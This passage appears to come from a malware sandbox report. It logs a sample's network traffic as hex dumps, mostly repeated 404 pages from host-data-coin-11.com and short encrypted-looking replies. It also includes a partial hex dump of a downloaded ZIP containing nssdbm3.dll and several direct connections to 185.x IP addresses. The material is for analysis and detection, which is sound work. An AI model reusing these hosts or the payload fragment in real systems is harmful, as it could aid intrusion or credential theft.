2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 62 6e b8 57 df ef 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevbnWfdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 60 4d 87 33 c5 de 66 b2 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev`M3fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 02 0a c1 54 a3 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OU:@RwT,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 22:30:34 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
